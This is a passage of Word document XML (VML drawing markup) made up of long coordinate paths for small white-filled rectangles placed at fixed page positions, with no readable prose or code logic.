,13271,2231,13275,2231,13279,2231,13282,2231,13286,2231,13290,2231,13294,2231,13298,2231,13302,2231,13306,2231,13310,2231,13314,2231,13319,2231,13323,2231,13328,2231,13332,2231,13337,2231,13342,2231,13347,2231,13352,2231,13357,2231,13362,2231,13367,2231,13372,2231,13378,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2231,13383,2230,13383,2230,13383,2230,13383,2230,13383,2230,13383,2230,13383,2230,13383,2229,13383,2229,13383,2229,13383,2229,13383,2229,13383,2228,13383,2228,13383,2228,13383,2227,13383,2227,13383,2227,13383,2227,13383,2226,13383,2226,13383,2225,13383,2225,13383,2225,13383,2224,13383,2224,13383,2223,13383,2223,13383,2222,13383,2222,13383,2221,13383,2221,13383,2220,13383,2219,13383,2219,13383,2218,13383,2217,13383,2217,13383,2216,13383,2215,13383,2214,13383,2214,13383,2213,13383,2212,13383,2211,13383,2210,13383,2209,13383,2208,13383,2207,13383,2206,13383,2205,13383,2204,13383,2203,13383,2202,13383,2201,13383,2200,13383,2199,13383,2197,13383,2196,13383,2195,13383,2194,13383,2192,13383,2191,13383,2189,13383,2188,13383,2187,13383,2185,13383,2183,13383,2182,13383,2180,13383,2179,13383,2177,13383,2175,13383,2173,13383,2172,13383,2170,13383,2168,13383,2166,13383,2164,13383,2162,13383,2160,13383,2158,13383,2156,13383,2154,13383,2152,13383,2149,13383,2147,13383,2145,13383,2143,13383,2140,13383,2138,13383,2135,13383,2133,13383,2130,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13383,2128,13382,2128,13382,2128,13382,2128,13382,2128,13382,2128,13381,2128,13381,2128,13381,2128,13381,2128,13380,2128,13380,2128,13380,2128,13379,2128,13379,2128,13379,2128,13378,2128,13378,2128,13377,2128,13377,2128,13376,2128,13376,2128,13375,2128,13374,2128,13374,2128,13373,2128,13372,2128,13371,2128,13371,2128,13370,2128,13369,2128,13368,2128,13367,2128,13366,2128,13365,2128,13364,2128,13363,2128,13362,2128,13360,2128,13359,2128,13358,2128,13356,2128,13355,2128,13354,2128,13352,2128,13351,2128,13349,2128,13347,2128,13346,2128,13344,2128,13342,2128,13340,2128,13338,2128,13336,2128,13334,2128,13332,2128,13330,2128,13328,2128,13326,2128,13324,2128,13321,2128,13319,2128,13316,2128,13314,2128,13311,2128,13308,2128,13306,2128,13303,2128,13300,2128,13297,2128,13294,2128,13291,2128,13288,2128,13285,2128,13281,2128,13278,2128,13275,2128,13271,2128,13268,2128,13264,2128,13260,2128,13256,2128,13252,2128,13249,2128,13244,2128,13240,2128,13236,2128,13232,2128,13227,2128,13223,2128,13219,2128,13214,2128,13209,2128,13204,2128,13200,2128,13195,2128,13189,2128,13184,2128,13179,2128,13174,2128,13168,2128,13163e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:657.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,13150" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:13150;width:110;height:230" coordorigin="2530,13150" coordsize="110,230" path="m2543,13163l2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2543,13163,2544,13163,2544,13163,2544,13163,2544,13163,2544,13163,2544,13163,2544,13163,2545,13163,2545,13163,2545,13163,2545,13163,2545,13163,2546,13163,2546,13163,2546,13163,2547,13163,2547,13163,2547,13163,2548,13163,2548,13163,2548,13163,2549,13163,2549,13163,2549,13163,2550,13163,2550,13163,2551,13163,2551,13163,2552,13163,2552,13163,2553,13163,2553,13163,2554,13163,2555,13163,2555,13163,2556,13163,2557,13163,2557,13163,2558,13163,2559,13163,2560,13163,2560,13163,2561,13163,2562,13163,2563,13163,2564,13163,2565,13163,2566,13163,2567,13163,2568,13163,2569,13163,2570,13163,2571,13163,2572,13163,2573,13163,2574,13163,2575,13163,2577,13163,2578,13163,2579,13163,2580,13163,2582,13163,2583,13163,2585,13163,2586,13163,2587,13163,2589,13163,2591,13163,2592,13163,2594,13163,2595,13163,2597,13163,2599,13163,2601,13163,2602,13163,2604,13163,2606,13163,2608,13163,2610,13163,2612,13163,2614,13163,2616,13163,2618,13163,2620,13163,2622,13163,2625,13163,2627,13163,2629,13163,2631,13163,2634,13163,2636,13163,2639,13163,2641,13163,2644,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13163,2646,13164,2646,13164,2646,13164,2646,13164,2646,13164,2646,13164,2646,13165,2646,13165,2646,13165,2646,13165,2646,13166,2646,13166,2646,13166,2646,13167,2646,13167,2646,13168,2646,13168,2646,13168,2646,13169,2646,13169,2646,13170,2646,13171,2646,13171,2646,13172,2646,13173,2646,13173,2646,13174,2646,13175,2646,13176,2646,13176,2646,13177,2646,13178,2646,13179,2646,13180,2646,13181,2646,13182,2646,13183,2646,13185,2646,13186,2646,13187,2646,13188,2646,13190,2646,13191,2646,13193,2646,13194,2646,13196,2646,13197,2646,13199,2646,13200,2646,13202,2646,13204,2646,13206,2646,13208,2646,13210,2646,13212,2646,13214,2646,13216,2646,13218,2646,13220,2646,13223,2646,13225,2646,13227,2646,13230,2646,13232,2646,13235,2646,13238,2646,13240,2646,13243,2646,13246,2646,13249,2646,13252,2646,13255,2646,13258,2646,13261,2646,13265,2646,13268,2646,13271,2646,13275,2646,13279,2646,13282,2646,13286,2646,13290,2646,13294,2646,13298,2646,13302,2646,13306,2646,13310,2646,13314,2646,13319,2646,13323,2646,13328,2646,13332,2646,13337,2646,13342,2646,13347,2646,13352,2646,13357,2646,13362,2646,13367,2646,13372,2646,13378,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2646,13383,2645,13383,2645,13383,2645,13383,2645,13383,2645,13383,2645,13383,2645,13383,2644,13383,2644,13383,2644,13383,2644,13383,2643,13383,2643,13383,2643,13383,2643,13383,2642,13383,2642,13383,2642,13383,2641,13383,2641,13383,2641,13383,2640,13383,2640,13383,2640,13383,2639,13383,2639,13383,2638,13383,2638,13383,2637,13383,2637,13383,2636,13383,2636,13383,2635,13383,2634,13383,2634,13383,2633,13383,2632,13383,2632,13383,2631,13383,2630,13383,2629,13383,2629,13383,2628,13383,2627,13383,2626,13383,2625,13383,2624,13383,2623,13383,2622,13383,2621,13383,2620,13383,2619,13383,2618,13383,2617,13383,2616,13383,2615,13383,2614,13383,2612,13383,2611,13383,2610,13383,2609,13383,2607,13383,2606,13383,2604,13383,2603,13383,2601,13383,2600,13383,2598,13383,2597,13383,2595,13383,2594,13383,2592,13383,2590,13383,2588,13383,2587,13383,2585,13383,2583,13383,2581,13383,2579,13383,2577,13383,2575,13383,2573,13383,2571,13383,2569,13383,2567,13383,2564,13383,2562,13383,2560,13383,2558,13383,2555,13383,2553,13383,2550,13383,2548,13383,2545,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13383,2543,13382,2543,13382,2543,13382,2543,13382,2543,13382,2543,13381,2543,13381,2543,13381,2543,13381,2543,13380,2543,13380,2543,13380,2543,13379,2543,13379,2543,13379,2543,13378,2543,13378,2543,13377,2543,13377,2543,13376,2543,13376,2543,13375,2543,13374,2543,13374,2543,13373,2543,13372,2543,13371,2543,13371,2543,13370,2543,13369,2543,13368,2543,13367,2543,13366,2543,13365,2543,13364,2543,13363,2543,13362,2543,13360,2543,13359,2543,13358,2543,13356,2543,13355,2543,13354,2543,13352,2543,13351,2543,13349,2543,13347,2543,13346,2543,13344,2543,13342,2543,13340,2543,13338,2543,13336,2543,13334,2543,13332,2543,13330,2543,13328,2543,13326,2543,13324,2543,13321,2543,13319,2543,13316,2543,13314,2543,13311,2543,13308,2543,13306,2543,13303,2543,13300,2543,13297,2543,13294,2543,13291,2543,13288,2543,13285,2543,13281,2543,13278,2543,13275,2543,13271,2543,13268,2543,13264,2543,13260,2543,13256,2543,13252,2543,13249,2543,13244,2543,13240,2543,13236,2543,13232,2543,13227,2543,13223,2543,13219,2543,13214,2543,13209,2543,13204,2543,13200,2543,13195,2543,13189,2543,13184,2543,13179,2543,13174,2543,13168,2543,13163e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:685.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,13710" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:13710;width:110;height:230" coordorigin="2110,13710" coordsize="110,230" path="m2128,13720l2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2128,13720,2129,13720,2129,13720,2129,13720,2129,13720,2129,13720,2129,13720,2129,13720,2129,13720,2130,13720,2130,13720,2130,13720,2130,13720,2131,13720,2131,13720,2131,13720,2131,13720,2132,13720,2132,13720,2132,13720,2133,13720,2133,13720,2133,13720,2134,13720,2134,13720,2134,13720,2135,13720,2135,13720,2136,13720,2136,13720,2137,13720,2137,13720,2138,13720,2138,13720,2139,13720,2140,13720,2140,13720,2141,13720,2142,13720,2142,13720,2143,13720,2144,13720,2145,13720,2145,13720,2146,13720,2147,13720,2148,13720,2149,13720,2150,13720,2151,13720,2152,13720,2153,13720,2154,13720,2155,13720,2156,13720,2157,13720,2158,13720,2159,13720,2160,13720,2162,13720,2163,13720,2164,13720,2165,13720,2167,13720,2168,13720,2170,13720,2171,13720,2173,13720,2174,13720,2176,13720,2177,13720,2179,13720,2180,13720,2182,13720,2184,13720,2186,13720,2187,13720,2189,13720,2191,13720,2193,13720,2195,13720,2197,13720,2199,13720,2201,13720,2203,13720,2205,13720,2207,13720,2210,13720,2212,13720,2214,13720,2216,13720,2219,13720,2221,13720,2224,13720,2226,13720,2229,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13720,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13721,2231,13722,2231,13722,2231,13722,2231,13722,2231,13722,2231,13723,2231,13723,2231,13723,2231,13724,2231,13724,2231,13724,2231,13725,2231,13725,2231,13726,2231,13726,2231,13727,2231,13727,2231,13728,2231,13728,2231,13729,2231,13729,2231,13730,2231,13731,2231,13732,2231,13732,2231,13733,2231,13734,2231,13735,2231,13736,2231,13737,2231,13738,2231,13739,2231,13740,2231,13741,2231,13742,2231,13743,2231,13745,2231,13746,2231,13747,2231,13749,2231,13750,2231,13752,2231,13753,2231,13755,2231,13756,2231,13758,2231,13760,2231,13762,2231,13763,2231,13765,2231,13767,2231,13769,2231,13771,2231,13773,2231,13776,2231,13778,2231,13780,2231,13783,2231,13785,2231,13787,2231,13790,2231,13793,2231,13795,2231,13798,2231,13801,2231,13804,2231,13807,2231,13810,2231,13813,2231,13816,2231,13819,2231,13822,2231,13826,2231,13829,2231,13833,2231,13836,2231,13840,2231,13844,2231,13847,2231,13851,2231,13855,2231,13859,2231,13863,2231,13868,2231,13872,2231,13876,2231,13881,2231,13885,2231,13890,2231,13895,2231,13899,2231,13904,2231,13909,2231,13914,2231,13919,2231,13925,2231,13930,2231,13935,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2231,13941,2230,13941,2230,13941,2230,13941,2230,13941,2230,13941,2230,13941,2230,13941,2229,13941,2229,13941,2229,13941,2229,13941,2229,13941,2228,13941,2228,13941,2228,13941,2227,13941,2227,13941,2227,13941,2227,13941,2226,13941,2226,13941,2225,13941,2225,13941,2225,13941,2224,13941,2224,13941,2223,13941,2223,13941,2222,13941,2222,13941,2221,13941,2221,13941,2220,13941,2219,13941,2219,13941,2218,13941,2217,13941,2217,13941,2216,13941,2215,13941,2214,13941,2214,13941,2213,13941,2212,13941,2211,13941,2210,13941,2209,13941,2208,13941,2207,13941,2206,13941,2205,13941,2204,13941,2203,13941,2202,13941,2201,13941,2200,13941,2199,13941,2197,13941,2196,13941,2195,13941,2194,13941,2192,13941,2191,13941,2189,13941,2188,13941,2187,13941,2185,13941,2183,13941,2182,13941,2180,13941,2179,13941,2177,13941,2175,13941,2173,13941,2172,13941,2170,13941,2168,13941,2166,13941,2164,13941,2162,13941,2160,13941,2158,13941,2156,13941,2154,13941,2152,13941,2149,13941,2147,13941,2145,13941,2143,13941,2140,13941,2138,13941,2135,13941,2133,13941,2130,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13941,2128,13940,2128,13940,2128,13940,2128,13940,2128,13940,2128,13940,2128,13940,2128,13939,2128,13939,2128,13939,2128,13939,2128,13939,2128,13938,2128,13938,2128,13938,2128,13937,2128,13937,2128,13937,2128,13936,2128,13936,2128,13935,2128,13935,2128,13934,2128,13934,2128,13933,2128,13933,2128,13932,2128,13931,2128,13930,2128,13930,2128,13929,2128,13928,2128,13927,2128,13926,2128,13925,2128,13925,2128,13924,2128,13922,2128,13921,2128,13920,2128,13919,2128,13918,2128,13917,2128,13915,2128,13914,2128,13913,2128,13911,2128,13910,2128,13908,2128,13907,2128,13905,2128,13903,2128,13902,2128,13900,2128,13898,2128,13896,2128,13894,2128,13892,2128,13890,2128,13888,2128,13886,2128,13883,2128,13881,2128,13879,2128,13876,2128,13874,2128,13871,2128,13869,2128,13866,2128,13863,2128,13861,2128,13858,2128,13855,2128,13852,2128,13849,2128,13846,2128,13842,2128,13839,2128,13836,2128,13832,2128,13829,2128,13825,2128,13821,2128,13818,2128,13814,2128,13810,2128,13806,2128,13802,2128,13798,2128,13794,2128,13789,2128,13785,2128,13781,2128,13776,2128,13771,2128,13767,2128,13762,2128,13757,2128,13752,2128,13747,2128,13742,2128,13737,2128,13731,2128,13726,2128,13720e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:685.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,13710" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:13710;width:110;height:230" coordorigin="2530,13710" coordsize="110,230" path="m2543,13720l2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2543,13720,2544,13720,2544,13720,2544,13720,2544,13720,2544,13720,2544,13720,2544,13720,2545,13720,2545,13720,2545,13720,2545,13720,2545,13720,2546,13720,2546,13720,2546,13720,2547,13720,2547,13720,2547,13720,2548,13720,2548,13720,2548,13720,2549,13720,2549,13720,2549,13720,2550,13720,2550,13720,2551,13720,2551,13720,2552,13720,2552,13720,2553,13720,2553,13720,2554,13720,2555,13720,2555,13720,2556,13720,2557,13720,2557,13720,2558,13720,2559,13720,2560,13720,2560,13720,2561,13720,2562,13720,2563,13720,2564,13720,2565,13720,2566,13720,2567,13720,2568,13720,2569,13720,2570,13720,2571,13720,2572,13720,2573,13720,2574,13720,2575,13720,2577,13720,2578,13720,2579,13720,2580,13720,2582,13720,2583,13720,2585,13720,2586,13720,2587,13720,2589,13720,2591,13720,2592,13720,2594,13720,2595,13720,2597,13720,2599,13720,2601,13720,2602,13720,2604,13720,2606,13720,2608,13720,2610,13720,2612,13720,2614,13720,2616,13720,2618,13720,2620,13720,2622,13720,2625,13720,2627,13720,2629,13720,2631,13720,2634,13720,2636,13720,2639,13720,2641,13720,2644,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13720,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13721,2646,13722,2646,13722,2646,13722,2646,13722,2646,13722,2646,13723,2646,13723,2646,13723,2646,13724,2646,13724,2646,13724,2646,13725,2646,13725,2646,13726,2646,13726,2646,13727,2646,13727,2646,13728,2646,13728,2646,13729,2646,13729,2646,13730,2646,13731,2646,13732,2646,13732,2646,13733,2646,13734,2646,13735,2646,13736,2646,13737,2646,13738,2646,13739,2646,13740,2646,13741,2646,13742,2646,13743,2646,13745,2646,13746,2646,13747,2646,13749,2646,13750,2646,13752,2646,13753,2646,13755,2646,13756,2646,13758,2646,13760,2646,13762,2646,13763,2646,13765,2646,13767,2646,13769,2646,13771,2646,13773,2646,13776,2646,13778,2646,13780,2646,13783,2646,13785,2646,13787,2646,13790,2646,13793,2646,13795,2646,13798,2646,13801,2646,13804,2646,13807,2646,13810,2646,13813,2646,13816,2646,13819,2646,13822,2646,13826,2646,13829,2646,13833,2646,13836,2646,13840,2646,13844,2646,13847,2646,13851,2646,13855,2646,13859,2646,13863,2646,13868,2646,13872,2646,13876,2646,13881,2646,13885,2646,13890,2646,13895,2646,13899,2646,13904,2646,13909,2646,13914,2646,13919,2646,13925,2646,13930,2646,13935,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2646,13941,2645,13941,2645,13941,2645,13941,2645,13941,2645,13941,2645,13941,2645,13941,2644,13941,2644,13941,2644,13941,2644,13941,2643,13941,2643,13941,2643,13941,2643,13941,2642,13941,2642,13941,2642,13941,2641,13941,2641,13941,2641,13941,2640,13941,2640,13941,2640,13941,2639,13941,2639,13941,2638,13941,2638,13941,2637,13941,2637,13941,2636,13941,2636,13941,2635,13941,2634,13941,2634,13941,2633,13941,2632,13941,2632,13941,2631,13941,2630,13941,2629,13941,2629,13941,2628,13941,2627,13941,2626,13941,2625,13941,2624,13941,2623,13941,2622,13941,2621,13941,2620,13941,2619,13941,2618,13941,2617,13941,2616,13941,2615,13941,2614,13941,2612,13941,2611,13941,2610,13941,2609,13941,2607,13941,2606,13941,2604,13941,2603,13941,2601,13941,2600,13941,2598,13941,2597,13941,2595,13941,2594,13941,2592,13941,2590,13941,2588,13941,2587,13941,2585,13941,2583,13941,2581,13941,2579,13941,2577,13941,2575,13941,2573,13941,2571,13941,2569,13941,2567,13941,2564,13941,2562,13941,2560,13941,2558,13941,2555,13941,2553,13941,2550,13941,2548,13941,2545,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13941,2543,13940,2543,13940,2543,13940,2543,13940,2543,13940,2543,13940,2543,13940,2543,13939,2543,13939,2543,13939,2543,13939,2543,13939,2543,13938,2543,13938,2543,13938,2543,13937,2543,13937,2543,13937,2543,13936,2543,13936,2543,13935,2543,13935,2543,13934,2543,13934,2543,13933,2543,13933,2543,13932,2543,13931,2543,13930,2543,13930,2543,13929,2543,13928,2543,13927,2543,13926,2543,13925,2543,13925,2543,13924,2543,13922,2543,13921,2543,13920,2543,13919,2543,13918,2543,13917,2543,13915,2543,13914,2543,13913,2543,13911,2543,13910,2543,13908,2543,13907,2543,13905,2543,13903,2543,13902,2543,13900,2543,13898,2543,13896,2543,13894,2543,13892,2543,13890,2543,13888,2543,13886,2543,13883,2543,13881,2543,13879,2543,13876,2543,13874,2543,13871,2543,13869,2543,13866,2543,13863,2543,13861,2543,13858,2543,13855,2543,13852,2543,13849,2543,13846,2543,13842,2543,13839,2543,13836,2543,13832,2543,13829,2543,13825,2543,13821,2543,13818,2543,13814,2543,13810,2543,13806,2543,13802,2543,13798,2543,13794,2543,13789,2543,13785,2543,13781,2543,13776,2543,13771,2543,13767,2543,13762,2543,13757,2543,13752,2543,13747,2543,13742,2543,13737,2543,13731,2543,13726,2543,13720e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:105.500pt;margin-top:712.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2110,14250" coordsize="110,230">
        <v:shape style="position:absolute;left:2110;top:14250;width:110;height:230" coordorigin="2110,14250" coordsize="110,230" path="m2128,14265l2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2128,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2129,14265,2130,14265,2130,14265,2130,14265,2130,14265,2131,14265,2131,14265,2131,14265,2131,14265,2132,14265,2132,14265,2132,14265,2133,14265,2133,14265,2133,14265,2134,14265,2134,14265,2134,14265,2135,14265,2135,14265,2136,14265,2136,14265,2137,14265,2137,14265,2138,14265,2138,14265,2139,14265,2140,14265,2140,14265,2141,14265,2142,14265,2142,14265,2143,14265,2144,14265,2145,14265,2145,14265,2146,14265,2147,14265,2148,14265,2149,14265,2150,14265,2151,14265,2152,14265,2153,14265,2154,14265,2155,14265,2156,14265,2157,14265,2158,14265,2159,14265,2160,14265,2162,14265,2163,14265,2164,14265,2165,14265,2167,14265,2168,14265,2170,14265,2171,14265,2173,14265,2174,14265,2176,14265,2177,14265,2179,14265,2180,14265,2182,14265,2184,14265,2186,14265,2187,14265,2189,14265,2191,14265,2193,14265,2195,14265,2197,14265,2199,14265,2201,14265,2203,14265,2205,14265,2207,14265,2210,14265,2212,14265,2214,14265,2216,14265,2219,14265,2221,14265,2224,14265,2226,14265,2229,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14265,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14266,2231,14267,2231,14267,2231,14267,2231,14267,2231,14268,2231,14268,2231,14268,2231,14269,2231,14269,2231,14269,2231,14270,2231,14270,2231,14271,2231,14271,2231,14272,2231,14272,2231,14273,2231,14273,2231,14274,2231,14275,2231,14275,2231,14276,2231,14277,2231,14278,2231,14279,2231,14280,2231,14280,2231,14281,2231,14282,2231,14283,2231,14285,2231,14286,2231,14287,2231,14288,2231,14289,2231,14291,2231,14292,2231,14293,2231,14295,2231,14296,2231,14298,2231,14299,2231,14301,2231,14303,2231,14304,2231,14306,2231,14308,2231,14310,2231,14312,2231,14314,2231,14316,2231,14318,2231,14320,2231,14322,2231,14325,2231,14327,2231,14330,2231,14332,2231,14335,2231,14337,2231,14340,2231,14343,2231,14345,2231,14348,2231,14351,2231,14354,2231,14357,2231,14360,2231,14364,2231,14367,2231,14370,2231,14374,2231,14377,2231,14381,2231,14384,2231,14388,2231,14392,2231,14396,2231,14400,2231,14404,2231,14408,2231,14412,2231,14417,2231,14421,2231,14425,2231,14430,2231,14434,2231,14439,2231,14444,2231,14449,2231,14454,2231,14459,2231,14464,2231,14469,2231,14475,2231,14480,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2231,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2230,14486,2229,14486,2229,14486,2229,14486,2229,14486,2229,14486,2228,14486,2228,14486,2228,14486,2227,14486,2227,14486,2227,14486,2227,14486,2226,14486,2226,14486,2225,14486,2225,14486,2225,14486,2224,14486,2224,14486,2223,14486,2223,14486,2222,14486,2222,14486,2221,14486,2221,14486,2220,14486,2219,14486,2219,14486,2218,14486,2217,14486,2217,14486,2216,14486,2215,14486,2214,14486,2214,14486,2213,14486,2212,14486,2211,14486,2210,14486,2209,14486,2208,14486,2207,14486,2206,14486,2205,14486,2204,14486,2203,14486,2202,14486,2201,14486,2200,14486,2199,14486,2197,14486,2196,14486,2195,14486,2194,14486,2192,14486,2191,14486,2189,14486,2188,14486,2187,14486,2185,14486,2183,14486,2182,14486,2180,14486,2179,14486,2177,14486,2175,14486,2173,14486,2172,14486,2170,14486,2168,14486,2166,14486,2164,14486,2162,14486,2160,14486,2158,14486,2156,14486,2154,14486,2152,14486,2149,14486,2147,14486,2145,14486,2143,14486,2140,14486,2138,14486,2135,14486,2133,14486,2130,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14486,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14485,2128,14484,2128,14484,2128,14484,2128,14484,2128,14484,2128,14483,2128,14483,2128,14483,2128,14483,2128,14482,2128,14482,2128,14482,2128,14481,2128,14481,2128,14480,2128,14480,2128,14479,2128,14479,2128,14478,2128,14478,2128,14477,2128,14476,2128,14476,2128,14475,2128,14474,2128,14474,2128,14473,2128,14472,2128,14471,2128,14470,2128,14469,2128,14468,2128,14467,2128,14466,2128,14465,2128,14464,2128,14463,2128,14461,2128,14460,2128,14459,2128,14457,2128,14456,2128,14454,2128,14453,2128,14451,2128,14450,2128,14448,2128,14446,2128,14444,2128,14443,2128,14441,2128,14439,2128,14437,2128,14435,2128,14433,2128,14430,2128,14428,2128,14426,2128,14423,2128,14421,2128,14419,2128,14416,2128,14413,2128,14411,2128,14408,2128,14405,2128,14402,2128,14399,2128,14396,2128,14393,2128,14390,2128,14387,2128,14384,2128,14380,2128,14377,2128,14373,2128,14370,2128,14366,2128,14362,2128,14359,2128,14355,2128,14351,2128,14347,2128,14343,2128,14338,2128,14334,2128,14330,2128,14325,2128,14321,2128,14316,2128,14311,2128,14307,2128,14302,2128,14297,2128,14292,2128,14287,2128,14281,2128,14276,2128,14271,2128,14265e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:712.500pt;width:5.500pt;height:11.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,14250" coordsize="110,230">
        <v:shape style="position:absolute;left:2530;top:14250;width:110;height:230" coordorigin="2530,14250" coordsize="110,230" path="m2543,14265l2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2543,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2544,14265,2545,14265,2545,14265,2545,14265,2545,14265,2545,14265,2546,14265,2546,14265,2546,14265,2547,14265,2547,14265,2547,14265,2548,14265,2548,14265,2548,14265,2549,14265,2549,14265,2549,14265,2550,14265,2550,14265,2551,14265,2551,14265,2552,14265,2552,14265,2553,14265,2553,14265,2554,14265,2555,14265,2555,14265,2556,14265,2557,14265,2557,14265,2558,14265,2559,14265,2560,14265,2560,14265,2561,14265,2562,14265,2563,14265,2564,14265,2565,14265,2566,14265,2567,14265,2568,14265,2569,14265,2570,14265,2571,14265,2572,14265,2573,14265,2574,14265,2575,14265,2577,14265,2578,14265,2579,14265,2580,14265,2582,14265,2583,14265,2585,14265,2586,14265,2587,14265,2589,14265,2591,14265,2592,14265,2594,14265,2595,14265,2597,14265,2599,14265,2601,14265,2602,14265,2604,14265,2606,14265,2608,14265,2610,14265,2612,14265,2614,14265,2616,14265,2618,14265,2620,14265,2622,14265,2625,14265,2627,14265,2629,14265,2631,14265,2634,14265,2636,14265,